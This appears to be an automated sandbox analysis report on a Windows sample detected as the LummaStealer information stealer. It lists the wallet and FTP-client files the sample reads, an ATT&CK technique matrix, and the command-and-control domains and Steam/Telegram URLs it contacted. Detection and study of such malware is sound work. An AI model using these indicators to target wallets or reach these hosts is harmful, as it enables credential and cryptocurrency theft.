          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: C:\Users\user\Desktop\12Kp1xbcjv.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: Yara matchFile source: 00000000.00000003.1280565524.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.1280817363.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.1265843707.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 12Kp1xbcjv.exe PID: 7384, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		31
          Virtualization/Sandbox Evasion          		2
          OS Credential Dumping          		321
          Security Software Discovery          		Remote Services41
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Obfuscated Files or Information          		LSASS Memory31
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Software Packing          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Download Video

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          12Kp1xbcjv.exe75%VirustotalBrowse
          12Kp1xbcjv.exe81%ReversingLabsWin32.Trojan.LummaStealer
          12Kp1xbcjv.exe100%AviraHEUR/AGEN.1314134

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=874474847aaa395d08_6395038482500%Avira URL Cloudsafe
          https://crosshairc.life/dAnjhw100%Avira URL Cloudmalware
          https://cjlaspcorne.icu/DbIpsg100%Avira URL Cloudmalware
          https://pupmeholk.bet/$a0%Avira URL Cloudsafe
          https://legenassedk.top/bdpWO100%Avira URL Cloudmalware
          https://weaponrywo.digital/dJSuaj100%Avira URL Cloudmalware
          https://pupmeholk.bet/a0%Avira URL Cloudsafe
          https://pupmeholk.bet/pLoskag0%Avira URL Cloudsafe
          https://pupmeholk.bet/pLoskan0%Avira URL Cloudsafe
          https://crosshairc.life/dAnjhw/100%Avira URL Cloudmalware
          https://cjlaspcorne.icu/DbIps100%Avira URL Cloudmalware
          https://htardwarehu.icu/Sbdsa100%Avira URL Cloudmalware
          https://pupmeholk.bet:443/pLoska0%Avira URL Cloudsafe
          https://pupmeholk.bet/0%Avira URL Cloudsafe
          https://pupmeholk.bet/Ha0%Avira URL Cloudsafe

          Domains and IPs

          Download Network PCAP: filteredfull

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          steamcommunity.com
          		104.73.234.102
          		truefalse
            		high
            pupmeholk.bet
            		104.21.32.1
            		truefalse
              		high
              t.me
              		149.154.167.99
              		truefalse
                		high
                jowinjoinery.icu
                		unknown
                		unknownfalse
                  		high
                  weaponrywo.digital
                  		unknown
                  		unknownfalse
                    		high
                    legenassedk.top
                    		unknown
                    		unknownfalse
                      		high
                      htardwarehu.icu
                      		unknown
                      		unknownfalse
                        		high
                        bugildbett.top
                        		unknown
                        		unknownfalse
                          		high
                          crosshairc.life
                          		unknown
                          		unknownfalse
                            		high
                            mrodularmall.top
                            		unknown
                            		unknownfalse
                              		high
                              cjlaspcorne.icu
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://steamcommunity.com/profiles/76561199822375128false
                                  		high
                                  https://t.me/farmercommufalse
                                    		high
                                    https://pupmeholk.bet/pLoskafalse
                                      		high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://player.vimeo.com12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://steamcommunity.com/?subsection=broadcasts12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://steamcommunity.com/bH12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://store.steampowered.com/subscriber_agreement/12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.gstatic.cn/recaptcha/12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://steamcommunity.com/profiles/76561199822375128/badges12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://steamcommunity.com/profiles/76561199822375128/inventory/12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://legenassedk.top/bdpWO12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://cjlaspcorne.icu/DbIpsg12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.valvesoftware.com/legal.htm12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.youtube.com12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119982237512812Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://crosshairc.life/dAnjhw12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
